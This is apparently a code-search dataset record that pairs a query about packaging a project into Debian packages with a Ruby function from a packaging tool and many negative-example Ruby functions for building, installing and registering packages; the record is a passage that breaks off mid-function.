Package the given package unless already registerd in reprepro if an existing source directory is given this will be used for packaging, otherwise the package will be bootstrapped | def package(pkginfo, options = Hash.new)
options, unknown_options = Kernel.filter_options options,
:force_update => false,
:patch_dir => nil,
:distribution => nil, # allow to override global settings
:architecture => nil
options[:distribution] ||= target_platform.distribution_release_name
options[:architecture] ||= target_platform.architecture
debian_pkg_name = debian_name(pkginfo)
if options[:force_update]
dirname = packaging_dir(pkginfo)
if File.directory?(dirname)
Packager.info "Debian: rebuild requested -- removing #{dirname}"
FileUtils.rm_rf(dirname)
end
end
options[:packaging_dir] = packaging_dir(pkginfo)
options[:release_name] = rock_release_name
begin
# Set the current pkginfo to set the install directory
# correctly
# FIXME: needs to be refactored
#
@packager_lock.lock
@current_pkg_info = pkginfo
pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))
if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools
package_default(pkginfo, options)
elsif pkginfo.build_type == :ruby
# Import bundles since they do not need to be build and
# they do not follow the typical structure required for gem2deb
if pkginfo.name =~ /bundles/
package_importer(pkginfo, options)
else
package_ruby(pkginfo, options)
end
elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package
package_importer(pkginfo, options)
else
raise ArgumentError, "Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}"
end
ensure
@current_pkg_info = nil
@packager_lock.unlock
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def package\n unless @package\n @package = package_resource_class.new(download_dest, run_context)\n tailor_package_to_platform\n end\n @package\n end",
"def bundle_package(*args, &block)\n ruby_package(*args) do |pkg|\n Autoproj.env_add_path 'ROCK_BUNDLE_PATH', pkg.srcdir\n if block_given?\n pkg.instance_eval(&block)\n end\n end\nend",
"def install_package(target_package_path); raise NotImplementedError; end",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def setup_package(package_name, &block)\n if !block\n raise ConfigError.new, \"you must give a block to #setup_package\"\n end\n\n package_definition = Autoproj.workspace.manifest.package(package_name)\n if !package_definition\n raise ConfigError.new, \"#{package_name} is not a known package\"\n elsif package_definition.autobuild.kind_of?(Autobuild::DummyPackage)\n # Nothing to do!\n else\n package_definition.add_setup_block(block)\n end\nend",
"def package!\n Packager.package!(self)\n Cleaner.remove_packaging(self)\n end",
"def needpackage *args\n\t\tpackage *args\n\tend",
"def package(output_dir = Pathname(Dir.pwd).expand_path)\n # Check the source\n check_source!\n # Turn the source into component parts to build a gem out of\n gem_parts = read_source_parts\n # Write these parts to a directory\n gem_dir = write_gem_dir(gem_parts)\n # Build a .gem file from this directory, and leave it in the `output_dir`\n build_package(gem_dir, output_dir)\n end",
"def convert_package(pkginfo, packaging_dir,\n gem_name: nil,\n patch_dir: nil\n )\n Packager.info \"Package Ruby: '#{pkginfo.name}' with gem_name: '#{gem_name}'\"\n\n # update dependencies in any case, i.e. independent if package exists or not\n deps = pkginfo.dependencies\n Dir.chdir(pkginfo.srcdir) do\n begin\n logname = \"package-ruby-#{pkginfo.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n logfile = File.join(log_dir, logname)\n\n gem = FileList[\"pkg/*.gem\"].first\n if not gem\n Packager.info \"#{self.class}: preparing gem generation in #{Dir.pwd}\"\n\n # Rake targets that should be tried for cleaning\n gem_clean_success = false\n Gem.clean_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to clean package '#{pkginfo.name}' using target '#{target}' #{msg} (see #{logfile})\"\n File.open(logfile,\"a+\") {|f| f.puts msg }\n else\n Packager.info \"#{self.class}: succeeded to clean package '#{pkginfo.name}' using target '#{target}'\"\n gem_clean_success = true\n break\n end\n end\n if not gem_clean_success\n Packager.warn \"#{self.class}: failed to cleanup ruby package '#{pkginfo.name}' -- continuing without cleanup\"\n end\n\n Packager.info \"#{self.class}: ruby package Manifest.txt is being autogenerated\"\n Package2Gem.generate_manifest_txt\n Package2Gem.cleanup_multiple_gemspec(gem_name)\n\n Packager.info \"#{self.class}: creating gem from package #{pkginfo.name} [#{File.join(log_dir, logname)}]\"\n\n if patch_pkg_dir(pkginfo.name, patch_dir, whitelist: [\"*.gemspec\", \"Rakefile\", \"metadata.yml\"])\n Packager.info \"#{self.class}: patched build files for ruby package before gem building: #{pkginfo.name}\"\n end\n\n # Allowed gem creation alternatives\n gem_creation_success = false\n\n # Gemspec often use the 'git ls -z' listings, which\n # might break if hidden files will be removed\n # without commiting -- so temporarily add and revert\n # again, to maintain the original commit id\n # TBD: or leave the commit and list the last N commits in the changelog\n Packager.info \"#{self.class}: temporarily commit changes in #{Dir.pwd}\"\n _,_,git_add_status = Open3.capture3(\"git add -A\")\n msg,git_commit_status = Open3.capture2(\"git commit -m 'Apaka: gem creation' --author 'Apaka Packager, <apaka@autocommit>'\")\n if !git_commit_status.success?\n Packager.info \"#{self.class}: commit failed: #{msg}\"\n end\n Gem.creation_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to create gem using target '#{target}' (see #{logfile})\"\n File.open(logfile,\"a+\") do |f|\n f.puts msg\n f.puts pkginfo.env\n end\n else\n Packager.info \"#{self.class}: succeeded to create gem using target '#{target}'\"\n gem_creation_success = true\n break\n end\n end\n if git_commit_status.success?\n Packager.info \"#{self.class}: git package status\"\n msg, git_revert = Open3.capture2(\"git reset --soft HEAD~1\")\n Packager.info \"#{self.class}: reversion of temporary commit failed\"\n end\n if not gem_creation_success\n raise RuntimeError, \"Debian: failed to create gem from RubyPackage #{pkginfo.name}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # other packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n if gem_name\n gem_name = gem.sub(Packaging.basename(pkginfo.name), gem_name)\n if gem != gem_name\n Packager.info \"#{self.class}: renaming #{gem} to #{gem_name}\"\n end\n else\n gem_name = gem\n end\n Packager.info \"#{self.class}: '#{pkginfo.name}' -- basename: #{Packaging.basename(pkginfo.name)} will be packaged as: #{gem_name}\"\n\n gem_final_path = File.join(packaging_dir, File.basename(gem_name))\n Packager.info \"#{self.class}: copy #{File.join(Dir.pwd, gem)} to #{gem_final_path}\"\n FileUtils.cp gem, gem_final_path\n return gem_final_path\n\n rescue Exception => e\n raise RuntimeError, \"#{self.class}: failed to create gem from RubyPackage #{pkginfo.name} -- #{e.message}\\n#{e.backtrace.drop(1).map{|s| \"\\t#{s}\"}}\"\n end\n end\n end",
"def source_package(options)\n package_common(options) do |pkg|\n pkg.srcdir = pkg.name\n yield(pkg) if block_given?\n end\nend",
"def package!\n Backup::Packager.new(self).package!\n end",
"def package_dependency(dep, bundle_info)\n info \"Starting packaging #{dep}\"\n\n instance = if dep.is_a? String\n dependency_object_by_name dep\n else\n dep\n end\n\n onError \"Invalid dependency name: #{dep}\" unless instance\n\n files = instance.getInstalledFiles\n\n if !files || files.empty?\n error \"Dependency '#{dep}' has no files to package\"\n return nil\n end\n\n # Add symbolic link targets\n links_found = true\n total_links = 0\n handled = []\n\n while links_found\n\n links_found = false\n\n files.each do |f|\n full = File.join(DependencyInstallFolder, f)\n\n next if handled.include? full\n\n next unless File.exist?(full) && File.symlink?(full)\n\n link_target = File.join(File.dirname(f), File.readlink(full))\n\n unless child_path?(DependencyInstallFolder,\n File.join(DependencyInstallFolder, link_target))\n onError 'symbolic link to be installed points outside the dependency folder: ' +\n link_target.to_s\n end\n\n links_found = true\n total_links += 1\n handled.append full\n files.append link_target\n end\n end\n\n handled = nil\n\n info \"Resolved #{total_links} symbolic links in packaged file list\" if total_links > 0\n\n precompiled_name = instance.getNameForPrecompiled + '_' + CurrentPlatform\n zip_name = precompiled_name + '.tar.xz'\n info_file = precompiled_name + '_info.txt'\n hash_file = precompiled_name + '_hash.txt'\n\n # Check that all exist\n Dir.chdir(DependencyInstallFolder) do\n files.each do |f|\n unless File.exist? f\n onError \"Dependency file that should be packaged doesn't exist: \" + f.to_s\n end\n end\n\n files_to_restore = strip_files_if_needed files\n\n File.open(info_file, 'w') do |f|\n f.puts \"RubySetupSystem precompiled library for #{CurrentPlatform}\"\n f.puts instance.Name + ' retrieved from ' + instance.RepoURL\n f.puts instance.Version.to_s + ' Packaged at ' + Time.now.to_s\n f.puts ''\n f.puts \"You can probably find license from the repo url if it isn't included here\"\n f.puts 'This info file is included in ' + zip_name\n end\n\n # When bundling everything needs to be made clean\n File.unlink zip_name if File.exist?(zip_name) && $options[:bundle]\n\n info \"Compressing files into #{zip_name}\"\n\n # Write a tar file with lzma compression\n runSystemSafe('tar', '-cJf', zip_name, info_file, *files)\n\n restore_stripped_files files_to_restore\n\n onError 'Failed to create zip file' unless File.exist? zip_name\n\n hash = SHA3::Digest::SHA256.file(zip_name).hexdigest\n\n # Write hash to file\n File.open(hash_file, 'w') do |f|\n f.puts hash\n end\n\n success \"Done with #{dep}, created: #{zip_name}\"\n info \"#{zip_name} SHA3: \" + hash\n # info \"#{zip_name} PLATFORM: \" + CurrentPlatform\n bundle_info[:dep_files].append zip_name\n return { name: precompiled_name, hash: hash }\n end\nend",
"def package_plugin(name)\n `cd #{@repository_path}; rake feather:package path=#{name} target=#{@build_path}`\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} #{ZIP_ARGS} -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def package *args\n\t\targs.each do | name |\n\t\t\treturn if haspackage? name\n\t\tend\n\t\t@cf.cfp_logger.notify VERBOSE_MAJOR,\"Skipping - package #{args.join(',')} not installed\"\n\t\traise PackageNotInstalledError.new('Package '+args.join(\",\")+' not installed')\n\tend",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def register_package(package, block = nil, package_set = main_package_set, file = nil)\n invalidate_ignored_package_names\n pkg = PackageDefinition.new(package, package_set, file)\n pkg.add_setup_block(block) if block\n @packages[package.name] = pkg\n metapackage pkg.package_set.name, pkg.autobuild\n metapackage \"#{pkg.package_set.name}.all\", pkg.autobuild\n pkg\n end",
"def build\n @model.custom_package? ? custom_package : standard_package\n end",
"def install_custom!\n package package_name do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n end",
"def install(pkg)\n package pkg do\n action :install\n end\nend",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} -9 -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def package(path, target)\n # Load manifest\n puts \"Load manifest...\"\n manifest = YAML::load_file(File.join(path, 'manifest.yml'))\n \n # Target directory for package files\n puts \"Target is: #{target}\"\n Dir.mkdir(target) if not File.exists?(target)\n \n # Package name\n package = \"#{manifest['name']}-#{manifest['version']}\"\n puts \"Package: #{package}\"\n \n # Tgz\n manifest['package'] = \"#{package}.tgz\"\n command = \"tar -czf #{package}.tgz --exclude pkg -C #{path} .\"\n puts \"Packing: #{command}\"\n system command\n \n # Move\n puts \"Finishing..\"\n FileUtils.mv(\"#{package}.tgz\", target)\n File.open(File.join(target, \"#{package}.yml\"), 'w') do |f|\n f.puts(manifest.to_yaml)\n f.close\n end\n \n puts \"Done.\"\nend",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def package\n @package ||= Package.initialize_from_path(path: \"#{resource_path}/package\",\n client: @client)\n end",
"def before_package_create(package)\n end",
"def before_package_create(package)\n end",
"def package(*patterns)\n install_package_matching patterns\n end",
"def package(package_name)\n raise RuntimeError, \"#{self.class} needs to overwrite package\"\n end",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def install_package host, package_name\n host.install_package package_name\n end",
"def locate_package(package_name, vers, verbose)\n local = has_local_package?(package_name)\n \n # It's true that we don't have a prerelase check here, but the\n # previous one we had didn't do anything, so it's better to have\n # none than one that doesn't work\n vers = \">= 0\" if vers == \">= 0-pre\"\n src_path = local ? locate_local_package(package_name) : \n BPM::Local.new.source_root(package_name, vers)\n\n return nil unless src_path\n\n pkg = BPM::Package.new(src_path)\n pkg.load_json # throws exception if json invalid\n pkg\n end",
"def install_golang_package(resource_name)\n ChefSpec::Matchers::ResourceMatcher.new(:golang_package, :install, resource_name)\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def deploy(package_path, opts={}, &block)\n end",
"def input(package)\n path_to_package = download_if_necessary(package, version)\n\n if File.directory?(path_to_package)\n setup_py = File.join(path_to_package, \"setup.py\")\n else\n setup_py = path_to_package\n end\n\n if !File.exist?(setup_py)\n logger.error(\"Could not find 'setup.py'\", :path => setup_py)\n raise \"Unable to find python package; tried #{setup_py}\"\n end\n\n load_package_info(setup_py)\n install_to_staging(setup_py)\n end",
"def manual_package_install(pkg_dependencies=[])\n\n unless pkg_dependencies.nil?\n pkg_dependencies.each do |pkg|\n\n if pkg =~ /\\.rpm/\n filename = $1 if pkg =~ /\\/(\\w+[a-zA-Z0-9\\-\\_\\.]+\\.rpm)\\z/\n p \"FILENAME: #{filename}\"\n remote_file \"#{Chef::Config[:file_cache_path]}/#{filename}\" do\n source \"#{pkg}\"\n action :create_if_missing\n end\n end\n\n package pkg do\n action :install\n if pkg =~ /\\.rpm/\n source \"#{Chef::Config[:file_cache_path]}/#{filename}\"\n provider Chef::Provider::Package::Rpm\n end\n end\n\n end\n end\n\nend",
"def package\n build\n # there is no need for IPA or dSYM unless we have a device/macosx build,\n # so do that part only on iphoneos/macosx SDKs\n #\n if(@configuration.sdk.eql? \"iphoneos\") then\n package_ios_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n elsif (@configuration.sdk.eql? \"macosx\") then\n package_macos_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n else\n package_simulator_app\n end\n end",
"def install_package(package_name, options = {})\n return true if install_package_impl(package_name, options)\n if options[:source]\n if options[:no_proxy]\n install_package package_name, options.merge(:source => false)\n else\n install_package package_name, options.merge(:no_proxy => true)\n end\n else\n return false unless options[:no_proxy]\n install_package package_name, options.merge(:no_proxy => true)\n end\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def package_setup\n raise NotImplementedError\n end",
"def inject_package(hash, info, package)\n arch = info[\"Architecture\"]\n arch = arch == \"all\" ? all_map : [arch]\n arch.map do |arch|\n package_file_name = File.join(\n package_root, package_bucket, origin,\n dist, component, \"binary-#{arch}\",\n File.basename(package)\n )\n hash.deep_merge!(\n \"apt\" => {\n origin => {\n dist => {\n \"components\" => {\n component => {\n \"binary-#{arch}\" => {\n info[\"Package\"] => {\n info[\"Version\"] => info.merge!(\n \"Filename\" => package_file_name,\n \"Size\" => File.size(package),\n ),\n },\n },\n \"binary-i386\" => {},\n },\n },\n },\n },\n },\n )\n File.join(\"apt\", origin, package_file_name)\n end\n end",
"def define_package_tasks\n prerelease_version\n\n Gem::PackageTask.new spec do |pkg|\n pkg.need_tar = @need_tar\n pkg.need_zip = @need_zip\n end\n\n desc \"Install the package as a gem. (opt. NOSUDO=1)\"\n task :install_gem => [:clean, :package, :check_extra_deps] do\n install_gem Dir[\"pkg/*.gem\"].first\n end\n\n desc \"Package and upload; Requires VERSION=x.y.z (optional PRE=a.1)\"\n task :release => [:prerelease, :release_to, :postrelease]\n\n # no doco, invisible hook\n task :prerelease do\n abort \"Fix your version before you release\" if spec.version.to_s =~ /borked/\n end\n\n # no doco, invisible hook\n task :release_to\n\n # no doco, invisible hook\n task :postrelease\n\n desc \"Sanity checks for release\"\n task :release_sanity do\n v = ENV[\"VERSION\"] or abort \"Must supply VERSION=x.y.z\"\n\n pre = ENV[\"PRERELEASE\"] || ENV[\"PRE\"]\n v += \".#{pre}\" if pre\n\n c = changes[/\\d\\S+/]\n\n abort \"Versions don't match: %s vs %s\" % [v, version] if v != version\n abort \"Versions don't match %s: %s vs %s\" % [history_file, v, c] if v != c\n end\n end",
"def input(vnd_pkg_path)\n\n # general params\n in_bundle = vnd_pkg_path.gsub(/^(.+\\/+)*vendor\\/+|\\/(?=\\/)|\\/+$/, \"\")\n @name = in_bundle.gsub(/[\\W]+/, \"-\")\n json = {}\n if @once\n @once = true\n raise FPM::InvalidPackageConfiguration, \"You can't input multiple bundle names. Only one package can be built at a time currently. Use a shell loop please.\"\n elsif in_bundle =~ /^composer\\/\\w+\\.\\w+/\n raise FPM::InvalidPackageConfiguration, \"composer/*.* files specified as input. Supply only one bundle id.\"\n end\n\n # copying mode\n if File.exist?(\"vendor/\" + in_bundle)\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n # localize contents below vendor/*/*/ input directory\n ::Dir.chdir(\"./vendor/#{in_bundle}/#{json['target-dir']}/\") do\n FileUtils.cp_r(glob(\"./*\"), build_path)\n end\n else\n # download one package (and dependencies, which are thrown away afterwards)\n ::Dir.chdir(staging_path) do\n ver = attributes[:composer_ver]\n safesystem(\n composer, \"require\", \"--prefer-dist\", \"--update-no-dev\", \"--ignore-platform-reqs\",\n \"--no-ansi\", \"--no-interaction\", in_bundle, *(ver ? [ver] : [])\n )\n # localize Vnd/Pkg folder\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n FileUtils.mv(glob(\"./vendor/#{in_bundle}/#{json['target-dir']}/*\"), build_path)\n FileUtils.rm_r(glob(\"#{staging_path}/*\"))\n end\n end\n\n #-- staging\n # At this point the build_path contains just the actual class files, etc.\n # Conversion to sys/phar/sysphar is handled in convert() along with the\n # dependency translation.\n composer_json_import(json)\n @target_dir = json.include?(\"target-dir\") ? json[\"target-dir\"] : in_bundle\n attributes[:phar_format] = \"zip+gz\" unless attributes[:phar_format_given?]\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def package_common(package_type, spec, &block)\n package_name = Autoproj.package_name_from_options(spec)\n\n if Autobuild::Package[package_name]\n current_file = Autoproj.current_file[1]\n old_file = Autoproj.workspace.manifest.definition_file(package_name)\n Autoproj.warn \"#{package_name} from #{current_file} is overridden by the definition in #{old_file}\"\n\n return Autobuild::Package[package_name]\n end\n\n pkg = Autoproj.define(package_type, spec, &block)\n pkg.srcdir = pkg.name\n pkg\nend",
"def package(name)\n Packaged.instance self , name\n end",
"def package(destination)\n output[:messages] << \"Cookbook(s) packaged to #{destination}\"\n end",
"def add_package(package)\n [package_handler(File.extname(package).tr(\".\", \"\")).add(content, package)].flatten.compact\n end",
"def move_package\n begin\n package_file = File.join(@tmpdir, 'pkg', \"#{@plugin.vendor}-#{@package_name}-#{@plugin.metadata[:version]}.tar.gz\")\n FileUtils.cp(package_file, '.')\n rescue => e\n puts 'Could not copy package to working directory'\n raise e\n end\n end",
"def create_package(logger:, release_model:, fix:, compiled_release:, package_meta:, release_dir:)\n name = package_meta['name']\n version = package_meta['version']\n\n package_attrs = {\n release: release_model,\n name: name,\n sha1: nil,\n blobstore_id: nil,\n fingerprint: package_meta['fingerprint'],\n version: version,\n }\n\n package = Models::Package.new(package_attrs)\n package.dependency_set = package_meta['dependencies']\n\n save_package_source_blob(logger, package, fix, package_meta, release_dir) unless compiled_release\n\n package.save\n end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted += \"-#{should}\"\n end\n output = rug \"--quiet\", :install, \"-y\", wanted\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted = \"#{wanted}-#{should}\"\n end\n\n #This has been tested with following zypper versions\n #SLE 10.2: 0.6.104\n #SLE 11.0: 1.0.8\n #OpenSuse 10.2: 0.6.13\n #OpenSuse 11.2: 1.2.8\n #Assume that this will work on newer zypper versions\n\n #extract version numbers and convert to integers\n major, minor, patch = zypper_version.scan(/\\d+/).map{ |x| x.to_i }\n self.debug \"Detected zypper version #{major}.#{minor}.#{patch}\"\n\n #zypper version < 1.0 does not support --quiet flag\n quiet = \"--quiet\"\n if major < 1\n quiet = \"--terse\"\n end\n\n license = \"--auto-agree-with-licenses\"\n noconfirm = \"--no-confirm\"\n\n #zypper 0.6.13 (OpenSuSE 10.2) does not support auto agree with licenses\n if major < 1 and minor <= 6 and patch <= 13\n zypper quiet, :install, noconfirm, wanted\n else\n zypper quiet, :install, license, noconfirm, wanted\n end\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def input(package)\n installdir = attributes[:virtualenv_install_location]\n m = /^([^=]+)==([^=]+)$/.match(package)\n package_version = nil\n\n is_requirements_file = (File.basename(package) == \"requirements.txt\")\n\n if is_requirements_file\n if !File.file?(package)\n raise FPM::InvalidPackageConfiguration, \"Path looks like a requirements.txt, but it doesn't exist: #{package}\"\n end\n\n package = File.join(::Dir.pwd, package) if File.dirname(package) == \".\"\n package_name = File.basename(File.dirname(package))\n logger.info(\"No name given. Using the directory's name\", :name => package_name)\n package_version = nil\n elsif m\n package_name = m[1]\n package_version = m[2]\n self.version ||= package_version\n else\n package_name = package\n package_version = nil\n end\n\n virtualenv_name = package_name\n\n self.name ||= package_name\n\n if self.attributes[:virtualenv_fix_name?]\n self.name = [self.attributes[:virtualenv_package_name_prefix],\n self.name].join(\"-\")\n end\n\n # prefix wins over previous virtual_install_location behaviour\n virtualenv_folder =\n if self.attributes[:prefix]\n self.attributes[:prefix]\n else\n File.join(installdir,\n virtualenv_name)\n end\n\n virtualenv_build_folder = build_path(virtualenv_folder)\n\n ::FileUtils.mkdir_p(virtualenv_build_folder)\n\n if self.attributes[:virtualenv_system_site_packages?]\n logger.info(\"Creating virtualenv with --system-site-packages\")\n safesystem(\"virtualenv\", \"--system-site-packages\", virtualenv_build_folder)\n else\n safesystem(\"virtualenv\", virtualenv_build_folder)\n end\n\n pip_exe = File.join(virtualenv_build_folder, \"bin\", \"pip\")\n python_exe = File.join(virtualenv_build_folder, \"bin\", \"python\")\n\n # Why is this hack here? It looks important, so I'll keep it in.\n safesystem(python_exe, pip_exe, \"install\", \"-U\", \"-i\",\n attributes[:virtualenv_pypi],\n \"pip\")\n\n extra_index_url_args = []\n if attributes[:virtualenv_pypi_extra_index_urls]\n attributes[:virtualenv_pypi_extra_index_urls].each do |extra_url|\n extra_index_url_args << \"--extra-index-url\" << extra_url\n end\n end\n\n find_links_url_args = []\n if attributes[:virtualenv_find_links_urls]\n attributes[:virtualenv_find_links_urls].each do |links_url|\n find_links_url_args << \"--find-links\" << links_url\n end\n end\n\n target_args = []\n if is_requirements_file\n target_args << \"-r\" << package\n else\n target_args << package\n end\n\n pip_args = [python_exe, pip_exe, \"install\", \"-i\", attributes[:virtualenv_pypi]] << extra_index_url_args << 